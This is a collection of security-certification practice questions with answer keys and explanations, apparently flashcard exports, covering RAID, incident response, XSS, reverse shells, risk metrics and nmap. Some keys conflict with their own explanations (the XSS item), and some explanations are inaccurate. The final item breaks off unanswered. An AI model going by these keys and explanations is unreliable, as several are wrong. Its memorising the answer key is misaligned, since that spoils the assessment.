A Redundant Array of Independent Disks (RAID) is installed with data written to two disks with 50% storage efficiency. Which RAID level has been utilized? A. Level 0 B. Level 1 C. Level 5 D. Level 6
B Redundant Array of Independent Disks (RAID) Level 1 uses mirroring where data is written to two disks simultaneously, which provides redundancy. The main drawback is its storage efficiency is only 50%. RAID Level 0 is striping without parity resulting in no fault tolerance. Data is written in blocks across several disks. RAID Level 5 has striping with parity. Data is written across three or more disks, but additional information is calculated. This allows the volume to continue if one disk is lost. This solution has better storage efficiency than RAID 1. RAID Level 6 has double parity or Level 5 with an additional parity stripe. This allows the volume to continue when two disks have been lost.
A company has a critical encryption key that has an M-of-N control configuration for protection. Examine the examples and select the one that correctly illustrates the proper configuration for this type of protection of critical encryption keys. A. M=1 and N=5 B. M=3 and N=5 C. M=6 and N=5 D. M=0 and N=5
B A correct configuration for an M-of-N control is M=3 and N=5. M stands for the number of authorized administrators that must be present to access the critical encryption keys and N is the total number of authorized administrators. In this scenario, 3 of the 5 administrators must be present for access. M is always greater than 1 for this type of configuration making M=1 and N=5 not a valid choice. If only 1 administrator must be present, this configuration would be unnecessary. M=6 and N=5 is not possible as this configuration is asking for more administrators to be present than is authorized. The final option of M=0 is not viable because M must always equal more than 1.
An attacker compromises a Linux host, installing a web shell as a backdoor. If the attacker gained access to the host through a connection the host established, what type of attack has occurred? A. Man-in-the-Browser (MitB) B. Reverse shell C. Rootkit D. Session hijacking
B A reverse shell is a common attack vector against a Linux host, where a victim host opens a connection to the attacking host through a maliciously spawned remote command shell. A man-in-the-browser (MitB) attack compromises the web browser. An attacker may be able to inspect session cookies, certificates, and data, change browser settings, perform redirection, and inject code. Malware running with system or root level privilege is referred to as a rootkit, which gives an attacker unrestricted access to everything from the root of the file system down. Session hijacking involves replaying a web application cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over an unsecured network.
Examine each attack vector. Which is most vulnerable to escalation of privileges? A. Software B. Operating System (OS) C. Applications D. Ports
B A vulnerability in an OS kernel file or shared library can allow privilege escalation, where the malware code runs with higher access rights (system or root). Root or system accounts are considered superuser accounts with administrative privileges. Software exploitation means an attack that targets a vulnerability in software code. An application vulnerability is a design flaw that can cause the security system to be circumvented or that will cause the application to crash. Security best practice for network configurations dictates that open ports should be restricted to only necessary services. Running unnecessary open ports and services increases the attack surface.
A security technician needs to transfer a large file to another user in a data center. Which statement best illustrates what type of encryption the technician should use to perform the task? A. The technician should use symmetric encryption for authentication and data transfer. B. The technician should use asymmetric encryption to verify the data center user's identity and agree on a symmetric encryption algorithm for the data transfer. C. The technician should use asymmetric encryption for authentication and data transfer. D. The technician should use symmetric encryption to verify the data center user's identity and agree on an asymmetric encryption algorithm for the data transfer.
B Asymmetric encryption is used for authentication, non-repudiation, and key agreement and exchange. Symmetric encryption is more efficient for bulk encryption of large amounts of data for transfer. Symmetric encryption is very fast and used for bulk encryption of large amounts of data. Symmetric encryption cannot be used for authentication or integrity, because both parties know the same key. Asymmetric encryption can be used to prove identity. Asymmetric encryption involves substantial computing overhead compared to symmetric encryption, so it is inefficient for large data transfers. Key agreement/exchange refers to settling on a secret symmetric key to use for bulk encryption without anyone else discovering it.
A systems administrator suspects that a virus has infected a critical server. In which step of the incident response process does the administrator notify stakeholders of the issue? A. Recovery B. Identification C. Containment D. Eradication
B In the identification phase, it is important to determine whether an incident has taken place, assess how severe it might be (triage), and notify stakeholders. The recovery phase reintegrates the system into the environment and may involve the restoration of data from backup and security testing. The systems administrator must monitor the systems more closely for a period to detect and prevent any reoccurrence of the attack. The containment phase aims to limit the scope and magnitude of the incident. The goal is to secure data while limiting the immediate impact on customers and business partners. In the eradication phase, the admin removes the cause and restores the system to a secure state by applying secure configuration settings and installing patches.
A hacker set up a Command and Control network to control a compromised host. What is the ability of the hacker to use this remote connection method as needed known as? A. Weaponization B. Persistence C. Reconnaissance D. Pivoting
B Persistence refers to the hacker's ability to reconnect to the compromised host and use it as a Remote Access Tool (RAT) or backdoor. To do this, the hacker must establish a Command and Control (C2 or C&C) network. Weaponization is an exploit used to gain some sort of access to a target's network, but it doesn't involve being able to reconnect. Reconnaissance is the process of gathering information, it is not related to Command and Control networks . Pivoting follows persistence. It involves a system and/or set of privileges that allow the hacker to compromise other network systems (lateral spread). The hacker likely has to find some way of escalating the privileges available to him/her.
Which scenario best describes provisioning? A. A developer removes an application from packages or instances. B. A developer deploys an application to the target environment. C. A developer sets up ID system for each iteration of a software product. D. A developer commits and tests updates.
B Provisioning is the process of deploying an application to the target environment. An enterprise provisioning manager might assemble multiple applications in a package. Deprovisioning is the process of removing an application from packages or instances. This might be necessary if software has to be completely rewritten or no longer satisfies its purpose. Version control is an ID system for each iteration of a software product. Most version control numbers represent both the version and internal build numbers for use in the development process. Continuous integration is the principle that developers should commit and test updates often—every day or sometimes even more frequently. This reduces the chances of two developers spending time on code changes that are later found to conflict with one another.
Compare and contrast the types of Cross-Site Scripting (XSS) attacks, and select the option that accurately distinguishes between them. A. Reflected and DOM attacks exploit client-side scripts, while a stored attack exploits vulnerabilities in server-side scripts. B. Reflected and stored XSS attacks exploit server-side scripts, while the DOM is used to exploit vulnerabilities in client-side scripts. C. Reflected and DOM attacks exploit server-side scripts, while a stored attack exploits vulnerabilities in client-side scripts. D. Nonpersistent and persistent attacks exploit client-side scripts, while the DOM is used to exploit vulnerabilities in server-side scripts.
B Reflected and DOM attacks exploit client-side scripts, while a stored attack exploits vulnerabilities in server-side scripts. Document Object Model (DOM) is when attackers send malicious scripts to a web app's client-side implementation of JavaScript to execute their attack solely on the client Both reflected and stored Cross-Site Scripting (XSS) attacks exploit server-side scripts, not client-side. Document Object Model (DOM) modifies the content and layout utilizing client-side scripts. While reflected Cross-Site Scripting (XSS) attacks exploit server-side scripts, Document Object Model (DOM) exploits client-side scripts. A stored attack exploits server-side scripts. A nonpersistent attack is another name for reflected, and a persistent attack is another name for a stored attack. Both of these attacks exploit server-side scripts. DOM exploits client-side scripts.
Management of a company identifies priorities during a risk management exercise. By doing so, which risk management approach does management use? A. Inherent risk B. Risk posture C. Risk transference D. Risk avoidance
B Risk posture is the overall status of risk management. Risk posture shows which risk response options management can identify and prioritize. The result of a quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before attempting any type of mitigation. Transference means assigning risk to a third party, such as an insurance company or a contract with a supplier that defines liabilities. Risk avoidance means that management halts the activity that is risk-bearing. For example, management may discontinue a flawed product to avoid risk.
Which type of attack disguises the nature of malicious input, preventing normalization from stripping illegal characters? A. Fuzzing B. Canonicalization C. Code reuse D. Code signing
B The threat actor might use a canonicalization attack to disguise the nature of the malicious input. Canonicalization refers to the way the server converts between the different methods by which a resource (such as a file path or URL) may be represented and submitted to the simplest (or canonical) method used by the server to process the input. Fuzzing is a means of testing that an application's input validation routines work well. The test, or vulnerability scanner, generates large amounts of deliberately invalid and random input and records the application's responses. Code reuse occurs through the use of a block of code from elsewhere in the same application, or from another application, to perform a different function. Code signing is the principal means of proving the authenticity and integrity of code.
Evaluate the functions of a Network-Based Intrusion Detection System (NIDS) and conclude which statements are accurate. (Select all that apply.) A. Training and tuning are fairly simple, and there is a low chance of false positives and false negatives. B. A NIDS will identify and log hosts and application activity that the administrator can use to analyze and take further action. C. Training and tuning are complex, and there is a high chance of false positive and negative rates. D. A NIDS will identify attacks and block the traffic to stop the attack. The administrator will be able to review the reports for future prevention.
B and C A NIDS can identify and log hosts and applications and detect attack signatures and other indicators of attack. An administrator can analyze logs to tune firewall rulesets, remove or block suspect hosts and processes, or deploy additional security controls to mitigate threats identified. One of the main disadvantages of NIDS is that training and tuning are complex, which results in high false positive and false negative rates, especially during initial deployment. NIDS training and tuning are complex, with high initial false positive and false negative rates. A NIDS will not block the traffic during an attack, which is a disadvantage. If an administrator does not immediately review logs during an attack, a delay will occur and the attack will continue.
Which statement regarding attacks on media access control (MAC) addresses accurately pairs the method of protection and what type of attack it guards against? (Select all that apply.) A. MAC filtering guards against MAC snooping. B. Dynamic Host Configuration Protocol (DHCP) snooping guards against MAC spoofing. C. MAC filtering guards against MAC spoofing. D. DAI guards against invalid MAC addresses
B and C In MAC filtering, a switch will record the specified number of MACs allowed to connect to a port, but then drop any traffic from other MAC addresses. DHCP snooping inspects traffic arriving on access ports to ensure that a host is not trying to spoof its MAC address. MAC filtering on a switch defines which MAC addresses are allowed to connect to a particular port, dropping other traffic to protect against MAC flooding attacks. DAI allows a network administrator to intercept, log, and discard ARP packets with invalid MAC address to IP address bindings.
A senior administrator is teaching a new technician how to properly develop a standard naming convention in Active Directory (AD). Examine the following responses and determine which statements are sound advice for completing this task. (Select all that apply.) A. Create as many root-level containers and nest containers as deeply as needed B. Consider grouping Organizational Units (OU) by location or department C. Build groups based on department, and keep all accounts, both standard and administrative, in the same group D. Within each root-level Organizational Unit (OU), use separate child OUs for different types of objects
B and D Organizational Units (OUs) represent administrative boundaries. They allow the enterprise administrator to delegate administrative responsibility for users and resources in different locations or departments. An OU grouped by location will be sufficient if different IT departments are responsible for services in different geographic locations. An OU grouped by department is more applicable if different IT departments are responsible for supporting different business functions. Within each root-level parent OU, use separate child OUs for different types of objects such as servers, client systems, users and groups. Be consistent. Do not create too many root-level containers or nest containers too deeply. They should not be more than five levels. Separate administrative user and group accounts from standard ones.
A startup designs a new online service and uses a serverless approach for some business functions. With this approach, how does the startup accomplish these functions? (Select all that apply.) A. Virtual machines B. Containers C. Single service D. Orchestration
B and D When an operation needs processing, by using a container, the cloud spins up the container to run the code, performs the processing, and then destroys the container. A virtual machine is a full-fledged operating system that runs in a virtual environment and considered a server, not serverless. Serverless refers to creating and using containers when needed. A single service would provide a specific output. Many services require working together in a serverless environment. Serverless architecture depends heavily on the concept of event-driven orchestration with many services involved to facilitate operations.
A network manager assists with developing a policy to protect the company from data exfiltration. The employee devises a list of focus points to include. Which plans, when consolidated, provide the best protection for the company? (Select all that apply.) A. Store backups of critical data, that may be targeted for destruction or ransom, on-site within a secure space. B. Creating a training program for all employees that reiterates the importance of knowing how to use encryption to secure data. C. Only allow removable media if it is company property, if it is required to perform a task, and if it has been cleared through the proper channels D. Encrypt all sensitive data at rest and disconnect systems that are storing archived data from the network
B, C, and D Employees need training in document confidentiality and how to use encryption to store and transmit data securely. Annual refresher training will remind employees of its importance. One mechanism for data exfiltration is by copying data to removable media or other device storage, such as USB drives or memory cards. Limiting the use of these to company property and only for job-related tasks helps reduce this risk. Always encrypt sensitive data at rest. Transferring data outside of the network will likely be useless without the decryption key. Offsite backups are the most secure for data that may be targeted for destruction or ransom. The data will remain on site, but the backups are offsite and provide redundancy for the company in the event of destruction or ransom demands.
You are asked to help design a security system. What are some methods that can be used to mitigate risks to embedded systems in security environments? (Select all that apply.) A. Faraday cage B. Firmware patching C. Network Segmentation D. Wrappers
B, C, and D Firmware patching for embedded systems is just as vital as keeping host OS software up to date on a traditional computer. Network segmentation is one of the core principles of network security. This control network should be separated from the corporate network using firewalls and VLANs. One way of increasing the security of data in transit for embedded systems is through the use of wrappers, such as IPSec. The only thing visible to an attacker or anyone sniffing the wire is the IPSec header, which describes only the tunnel endpoints. A faraday cage would help prevent outside interference or leakage of wireless radio frequencies, but may inhibit the use of a security system, such as a keyless door.
Compare and evaluate the various levels and types of platform security to conclude which option applies to a hardware Trusted Platform Module (TPM). A. A specification for a suite of high-level communication protocols used for network communication. B. The boot metrics and operating system files are checked and signatures verified at logon. C. Digital certificates, keys, and hashed passwords are maintained in hardware-based storage. D. The industry standard program code that is designed to operate the essential components of a system.
C A Trusted Platform Module (TPM) is a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information. TPM is not a specification for a suite of high-level communication protocols used for network communication. A secure boot is a security system designed to prevent a computer from being hijacked by a malicious OS. The Basic Input/Output System (BIOS) provides an industry standard program code that operates the essential components of the PC and ensures that the design of each manufacturer's motherboard is PC compatible.
IT staff looks to provide a high level of fault tolerance while implementing a new server. With which systems configuration approach does the staff achieve this goal? A. Adapting to demand in real time B. Adding more resources for power C. Duplicating critical components D. Increasing the power of resources
C A system often achieves fault tolerance by provisioning redundancy for critical components and single points of failure. Although not required, a redundant component is available for system recovery. Elasticity refers to the system's ability to handle any changes in resource demand in real-time. Elasticity often applies to processing power and storage. A system achieves scalability by adding resources. To scale out is to add more resources in parallel with existing resources. A system achieves scalability by adding resources. To scale up is to increase the power of existing resources.
Which cookie attribute can a security admin configure to help mitigate a request forgery attack? A. Secure B. HttpOnly C. SameSite D. Cache-Control
C Cookies can be a vector for session hijacking and data exposure if not configured correctly. Use the SameSite attribute to control where a cookie may be sent, mitigating request forgery attacks. Set the Secure attribute to prevent a cookie from being sent over unencrypted HTTP. Set the HttpOnly attribute to make the cookie inaccessible to document object model/client-side scripting. A number of security options can be set in the response header returned by the server to the client, including Cache-Control, which sets whether the browser can cache responses. Preventing caching of data protects confidential and personal information where multiple users might share the client device.
An organization routinely communicates directly to a partner company via a domain name. The domain name now leads to a fraudulent site for all users. Systems administrators for the organization find incorrect host records in DNS. What do the administrators believe to be the root cause? A. A server host has a poisoned arp cache. B. Some user systems have invalid hosts file entries. C. An attacker masquerades as an authoritative name server. D. The domain servers have been hijacked.
C DNS server cache poisoning aims to corrupt the records held by the DNS server itself. A DNS server queries an authoritative server for domain information. An attacker can masquerade as an authoritative name server and respond with fraudulent information. An ARP cache contains entries that map IP addresses to MAC addresses. An ARP cache is not related to name resolution. Before developers created DNS, early name resolution took place using a text file named HOSTS. In this case, all users are experiencing an issue, not just some. Domain Reputation can be impacted if an attacker hijacks public servers. In this case, systems admin found invalid host records, which ruled out hijacking.
An Identity and Access Management (IAM) system has four main processes. Which of the following is NOT one of the main processes? A. Accounting B. Identification C. Integrity D. Authentication
C Integrity is the fundamental security goal of keeping organizational information accurate, free of errors, and without unauthorized modifications. However, it is not part of the IAM system. IAM defines the attributes that comprise an entity's identity. The four processes include Authorization, Accounting, Identification, and Authentication. Accounting is tracking authorized usage of a resource or use of rights by a subject and alerting when unauthorized use is detected or attempted. Identification is creating an account or ID identifying the user, device, or process on the network. Authentication is proving that a subject is who or what it claims to be when attempting to access the resource.
Management of a company practices qualitative risk when assessing a move of systems to the cloud. How does the company indicate any identified risk factors? A. With an exposure factor (EF) B. With an annualized loss expectancy (ALE) C. With a classification system D. With transference
C Qualitative risk assessment uses categories or classifications such as Irreplaceable, High Value, Medium Value, and Low Value. An Exposure Factor (EF) is the percentage of the asset value that would be lost in the event of an incident. Annualized Loss Expectancy (ALE) is the amount that would be lost over the course of a year. To calculate the ALE, multiply the SLE by the Annualized Rate of Occurrence (ARO). Transference means assigning risk to a third party, such as an insurance company or a contract with a supplier that defines liabilities.
A security team is in the process of selecting a cryptographic suite for their company. Analyze cryptographic implementations and determine which of the following performance factors is most critical to this selection process if users primarily access systems on mobile devices. A. Speed B. Latency C. Computational overhead D. Cost
C Some technologies or ciphers configured with longer keys require more processing cycles and memory space, which makes them slower and consume more power. This makes them unsuitable for handheld devices and embedded systems that work on battery power. Speed is most impactful when processing large amounts of data. For some use cases, the time required to obtain a result is more important than a data rate. Latency issues may negatively affect performance when an operation or application times out before the authentication handshake. Cost issues may arise in any decision-making process, but for mobile device cryptography, computing overhead is a primary limiting factor.
Analyze each statement and determine which describes a fundamental improvement on traditional log management that security information and event management (SIEM) offers. A. SIEM is completely automated; it requires no manual data preparation. B. SIEM logs ensure non-repudiation, whereas other logs cannot link a specific user to an action. C. SIEM can perform correlation, linking observables into meaningful indicators of risk or compromise. D. SIEM addresses the issue of sheer volume of alerts, using machine learning to facilitate threat hunting.
C While SIEM can automate many functions of log collection and review, security managers may also have to manually prepare data using a Linux command line. Logs typically associate an action with a particular user, satisfying non-repudiation. SIEM correlates individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IOC). Correlation is the principal factor distinguishing it from basic log management. Security orchestration, automation, and response (SOAR) is a solution to the problem of the volume of alerts overwhelming analysts' ability to respond. A security engineer may implement SOAR as a standalone technology or integrate it with a SIEM, using machine/deep learning techniques to enrich data for use in incident response and threat hunting.
An organization configures both a warm site and a hot site for disaster preparedness. Doing so poses which challenges for the organization? (Select all that apply.) A. Resiliency B. Diversity C. Complexity D. Budgetary
C and D Creating a duplicate of anything doubles the complexity of securing that resource properly. Having multiple sites increases the complexity of the infrastructure. Providing redundancy on a scale that includes multiple locations can be very expensive. Businesses often lease sites from service providers to reduce costs. Enterprise-level networks often provision resiliency at the site level. An alternate processing or recovery site is a location that can provide the same (or similar) level of service. Technology diversity refers to environments that are a mix of operating systems, applications, coding languages, virtualization solutions, etc. The diversity level should not change according to the number of sites as they are simply mirrored.
CYOD
Choose Your Own Device
XSS
Cross-site scripting
A system administrator suspects a memory leak is occurring on a client. Determine which scenario would justify this finding. A. A rapid decrease in disk space has been logged. B. High page file utilization has been logged. C. High memory utilization during scheduled backups after-hours. D. Software does not release allocated memory when it is done with it.
D A memory leak is a process that takes up memory without subsequently freeing it up, which a worm or other type of malware can cause. Looking for decreasing available bytes and increasing committed bytes can detect this type of memory leak. A rapid decrease in disk space is related to storage usage rather than memory usage. This may occur during data migration or archival. High page file utilization occurs when there is insufficient physical memory to support multiple running applications. This could indicate the existence of malware. High utilization out-of-hours can be suspicious if no scheduled activities are occurring, such as backup or virus scanning.
A systems administrator deploys a cloud access security broker (CASB) solution for user access to cloud services. Evaluate the options and determine which solution may be configured at the network edge and without modifying a user's system. A. Single sign-on B. Application programming interface C. Forward proxy D. Reverse proxy
D A reverse proxy (positioned at the cloud network edge) directs traffic to cloud services if the contents of that traffic comply with policy. This does not require configuration of users' devices. Single sign-on authentication and enforcing access controls and authorizations from the enterprise network to the cloud provider is a feature of a CASB. Rather than placing a CASB appliance or host inline with cloud consumers and the cloud services, an API-based CASB brokers connections between the cloud service and the cloud consumer. A forward proxy is a security appliance or host, positioned at the client network edge, that forwards user traffic to the cloud network if the contents of that traffic comply with policy. This requires configuration of users' devices.
An administrator uses data from a Security Information and Event Management (SIEM) system to identify potential malicious activity. Which feature does the administrator utilize when implementing rules to interpret relationships between datapoints to diagnose incidents? A. Retention B. Trend Analysis C. Baseline D. Correlation
D Correlation means interpreting the relationship between individual data points to diagnose incidents of significance to the security team. A SIEM correlation rule is a statement that matches certain conditions. A SIEM can enact a retention policy to keep historical log and network traffic data for a defined period. This allows for a retrospective incident and threat hunting. Trend analysis is the process of detecting patterns or indicators within a data set over a time series and using those patterns to make predictions about future events. A baseline is a point of reference that provides a record of settings and configurations for comparison purposes.
A network administrator wants to use a proxy server to prevent external hosts from connecting directly with application servers. Which proxy server implementation will best fit this need? A. Transparent proxy server B. Non-transparent proxy server C. Caching proxy server D. Reverse proxy server
D Deployed on the network edge, reverse proxy servers protect servers from direct contact with client requests from a public network (the Internet). A transparent (or forced or intercepting) proxy intercepts client traffic without the client having to reconfigure with the proxy server address. The network admin may implement a transparent proxy on a switch, router, or other inline network appliance. The network admin may configure the client with a non-transparent proxy server address and port number to use it (often configured as port 8080.). A caching server that does not require a client-side configuration is called a transparent proxy server. In this type of server, the client is unaware of a proxy server, which redirects client requests without modification.
Which situation would require keyboard encryption software be installed on a computer? A. To set up single sign-on privileges B. To comply with input validation practices C. For the purpose of key management D. To protect against spyware
D Keyboard encryption software is used to protect against keyloggers, which record keystrokes for the purpose of stealing data. Keyloggers are spyware. Single sign-on is a technology that enables a user to authenticate once and receive authorizations for multiple services. It does not require keyboard encryption. Input validation involves limiting the type of data a user can enter into specific fields, such as not allowing special characters in a user name field. Encryption is not a concern. Key management is the process of administering cryptographic keys and is performed by a Certificate Authority. It is not applicable to keyboard encryption.
A company has thirty servers that run for 125 hours, with three servers that fail. Rounding to the nearest whole number, calculate the Mean Time Between Failures (MTBF) for this scenario. A. 125 B. 41 C. 3,750 D. 1,250
D The calculation for Mean Time Between Failures (MTBF) is the total time divided by the number of total failures. In this scenario, the company has 30 servers that run for 125 hours (30x125), with the resulting product of 3,750. This result is then divided by the number of failures (3,750/3), which equals an MTBF of 1,250. The calculation for Mean Time to Failure (MTTF) is the same test but divided by the number of devices. (30x125)/30, with a result of 125. This answer choice (B) is derived by dividing the number of running hours by the number of systems. These two figures should be multiplied then divided by the failures for MTBF. This answer choice (C) is the result prior to dividing by the number of failures. Dividing 3,750 by 3 will give the correct MTBF.
A company is instituting role-based training. Which type of training will the company require the data owner to most likely complete? A. Expert knowledge of IT security and network design B. Training to ensure technical understanding of access controls C. Training on data management and PII plus regulatory and compliance frameworks D. Training on compliance issues and data classification systems
D The data owner is responsible for data guardianship and training, for this role will focus on compliance issues and data classification systems. The system owner is responsible for designing and planning computers, networks, and database systems. The role requires expert knowledge of Information Technology (IT) security and network design. The system administrator is responsible for the day-to-day system admin role and requires a technical understanding of access controls and privilege management systems. Privileged users are employees with access to privileged data and require extra training on data management and Personally Identifiable Information (PII) plus any relevant regulatory or compliance frameworks.
Security information and event management (SIEM) collect data inputs from multiple sources. Which of the following is NOT one of the main types of log collection for SIEM? A. Agent-based B. Listener/collector C. Sensor (sniffer) D. Artificial intelligence (AI)
D With an agent-based approach, data managers must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage. A listener/collector appliance gathers or receives log and/or state data from other network systems, using a protocol, such as syslog or simple network management protocol (SNMP). As well as log data, the SIEM might collect packet captures and traffic flow data from sniffers/sensors. AI and machine learning can drive correlation efforts for automated analysis.
Evaluate the metrics associated with Mission Essential Functions (MEF) to determine which example is demonstrating Work Recovery Time (WRT). A business function takes five hours to restore, resulting in an irrecoverable business failure. It takes two hours to identify an outage and restore the system from backup. It takes three hours to restore a system from backup, and the restore point is two hours prior to the outage. It takes three hours to restore a system from backup, reintegrate the system, and test functionality.
D Work Recovery Time (WRT) is the additional time that it takes to restore data from backup, reintegrate different systems, and test overall functionality. This can also include briefing system users on any changes or different working practices so that the business function is again fully supported. The Maximum Tolerable Downtime (MTD) is the longest period of time that a business function outage may occur without causing irrecoverable business failure. Recovery Time Objective (RTO) is the period following a disaster that an individual IT system may remain offline. This represents the amount of time it takes to identify a problem that exists and perform recovery steps. Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. If a database is destroyed and has an RPO of 24 hours, the data can be recovered to a point not more than 24 hours before the database was infected.
DHS
Department of Homeland Security
DOM
Document Object Model
MSSP
Managed Security Service Provider
MTTR
Mean Time To Repair
OSINT
Open Source Intelligence
OU
Organizational unit
Port 465
SMTP over SSL
A system administrator must scan the company's web-based application to identify which ports are open and which operating system can be seen from the outside world. Determine the syntax that should be used to yield the desired information if the administrator will be executing this task from a Linux command line. A. netstat -a B. nmap -O C. nmap -sS 10.1.0.0/24 D. netstat -n
The correct syntax is nmap -O. When the -O switch is used with nmap, it displays open ports and the installed operating system, but does not show the version. The netstat command checks the state of ports on the local machine. In Linux, the -a switch displays ports in the listening state, it does not enable software and version detection. Using nmap -sS 10.1.0.0/24 is a fast technique also referred to as half-open scanning, as the scanning host requests a connection without acknowledging it. Netstat shows the state of TCP/UDP ports on the local machine. Netstat -n suppresses name resolution, so host IP addresses and numeric ports are shown in the output.
TGT
Ticket Granting Ticket
2FA
Two-factor authentication
WEP
Wired Equivalent Privacy
ROSI calculation
[(ALE - ALEm) - Cost of Solution] / Cost of Solution, where ALE is before controls and ALEm is after controls.
While preparing a disaster recovery plan, management at a company considers how far back it can allow for the loss of data. Which metric does management use to describe this business essential data in terms of recovery? A. Recovery point objective B. Work recovery time C. Maximum tolerable downtime D. Mean time to repair
A Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. If data is not recoverable (such as the last five working days of data), there is significant impact to operations of the business. Work Recovery Time (WRT) follows systems recovery. During this time there may be additional work to reintegrate different systems and test overall functionality. Maximum tolerable downtime (MTD) is the longest period of time that a business function outage may occur for without causing irrecoverable business failure. Mean time to repair (MTTR) is a measure of the time taken to correct a fault so that the system is restored to full operation.
An organization considers installing fingerprint scanners at a busy entry control point to a secure area. What concerns might arise with the use of this technology? (Select all that apply.). A. Fingerprint scanning is relatively easy to spoof. B. Installing equipment is cost-prohibitive. C. Surfaces must be clean and dry. D. The scan is highly intrusive.
A and C The main problem with fingerprint scanners is that it is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool the scanner. The technology required for scanning and recording fingerprints is relatively inexpensive, and the process quite straightforward. A fingerprint sensor is usually a small capacitive cell that can detect the unique pattern of ridges making up the pattern. Moisture or dirt can prevent good readings, so facilities using fingerprint scanners must keep readers clean and dry, which can prove challenging in high throughput areas. Fingerprint technology is non-intrusive and relatively simple to use.
A systems administrator realizes the need to scale a server for high availability purposes. Which approaches does the administrator utilize to scale out the virtual system? (Select all that apply.) A. Add an additional CPU B. Give important processes higher priority C. Free up CPU usage by eliminating services D. Add additional RAM
A and D
A company hires a security consultant to train the IT team in incident response procedures. The consultant facilitates a question and answer session, and the IT team practices running scans. Determine which type of incident response exercise the consultant facilitates in this scenario. A. Tabletop exercise B. Walkthrough C. Simulation D. Forensics
B In a walkthrough, a facilitator presents a scenario and the incident responders demonstrate what actions they would take. Responders may run scans and analyze sample files, typically on sandboxed versions of the company's actual response and recovery tools. The facilitator in a tabletop exercise presents a scenario and the responders explain what action they would take to manage the threat—without the use of computer systems. Simulations are team-based exercises, where the red team attempts an intrusion, the blue team operates response and recovery controls, and a white team moderates and evaluates the exercise. Digital forensics describes techniques to collect and preserve evidence. Forensics procedures are detailed and time-consuming, where the purpose of incident responses are usually urgent.
A new IT administrator accidently causes a fire in the IT closet at a small company. Consider the disaster types and conclude which types this event might classify as. (Select all that apply.) A. External B. Man-made C. Internal D. Environmental
B and C A man-made disaster event is one where human agency is the primary cause. Typical examples include terrorism, war, vandalism, pollution, and arson. There can also be accidental man-made disasters. An internal disaster is one that is caused by malicious activity or by accident by an employee or contractor. In this case, the fire was accidental. External disaster includes disasters that have an impact on the organization through wider environmental or social impacts, such as disruption of public services or impacts to a supply chain. An environmental disaster, or natural disaster, is one that could not be prevented through human agency. Environmental disasters include river or sea floods, earthquakes, and storms.
A server administrator configures digital signatures for secure communications. By doing so, the administrator accomplishes which secure method of communication? (Select all that apply.) A. Configuring encryption so no two hashes are the same B. Combining public key cryptography with hashing algorithms C. Using the same secret key to perform both encryption and decryption D. Providing authentication, integrity, and non-repudiation
B and D Public key cryptography can authenticate a sender because it controls a private key that encrypts messages. Adding hashing to an encrypted message proves integrity by computing a unique checksum. In a symmetric encryption cipher, the same secret key is used to perform both encryption and decryption operations. This does not define a digital signature. If two hashes are the same, then the data has not been tampered with during transmission. This is not something the administrator configures, but rather the result of secure communication. Public key cryptographic functions can be combined with hashing to authenticate a sender and prove the integrity of a message. This usage is called a digital signature.
A banking firm's IT team discovers a possible man-in-the-middle attack. Which of the following statements describes an assessment tool, built into the operating system, that would result in this discovery? (Select all that apply.) A. This tool is an open-source graphical packet capture and analysis utility, with installer packages for most operating systems. B. This tool sends probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. C. This tool will repair the boot sector. D. This tool displays the local machine's Address Resolution Protocol (ARP) cache.
B and D tracert (Windows) and traceroute (Linux) allow the user to view and configure the host's local routing table using probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. The ARP cache shows the MAC address of the interface associated with each IP address the local host has communicated with recently. A discrepancy in the MAC address may indicate a man-in-the-middle attack. The best way to resolve errors such as "Boot device not found," "OS not found," or "Invalid drive specification" is to use the boot disk option in your anti-virus software. This will include a scanner that may detect the malware that caused the problem in the first place and contain tools to repair the boot sector. Wireshark is an open-source graphical packet capture and analysis utility, with installer packages for most operating systems. However it is not built into the operating system.
Management at a financial firm is assembling an incident response team that will be responsible for handling certain aspects of recovery and remediation following a security incident. What internal offices should provide a representative to serve as a member of this team? (Select all that apply.) A. Sales B. Legal C. HR D. PR
B, C, and D It is important to have access to legal expertise so that the team can evaluate incident response from the perspective of compliance with laws and industry regulations. An HR member should be on the team. Incident prevention and remediation actions may affect employee contracts, employment law, and more. A team is likely to require public relations input, so that any negative publicity from a serious incident can be managed. The PR role should be the one dealing with any media outlets. A sales representative would not be required. Typically, a team will consist of those that deal with any sort of rules, regulations, laws, and communications.
An unauthorized person gains access to a restricted area by blending in with a crowd of employee's as they approach the security desk and show their badges to the guard. While walking down a long hallway, the group is stopped at a turnstile and the unauthorized person is discovered. What type of policy prevented this type of social engineering attack? A. CCTV policy B. Mantrap policy C. ID badge policy D. Skimming policy
B. A mantrap is a physical security control used for critical assets, where one gateway leads to an enclosed space protected by another barrier. CCTV (closed circuit television) is a cheaper means of providing surveillance than maintaining separate guards at each gateway or zone, though still not cheap to set up if the infrastructure is not already in place on the premises. Anyone moving through secure areas of a building should be wearing an ID badge. Security should stop anyone without an ID badge. Skimming involves the use of a counterfeit card reader to capture card details, which are then used to program a duplicate.
What type of phishing attack targets upper-level management? A.Pharming B. Credential harvesting C. Whaling D. Typosquatting
C. Whaling is a directed spear phishing attack that targets upper levels of management in a target organization. Pharming is a passive means of redirecting users from a legitimate website to a malicious one by corrupting the way the victim's computer performs Internet name resolution. Within the realm of phishing and pharming, credential harvesting is a campaign specifically designed to steal account credentials. Such attacks may use alarming messages as bait. A typosquatting threat actor registers a domain name that is very similar to a real one, hoping that users will not notice the difference. These are also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might be used for pharming and phishing attacks.
What exploitation method targets near field communication (NFC) devices? A. Juice jacking B. Bluesnarfing C. Remote wipe D. Skimming
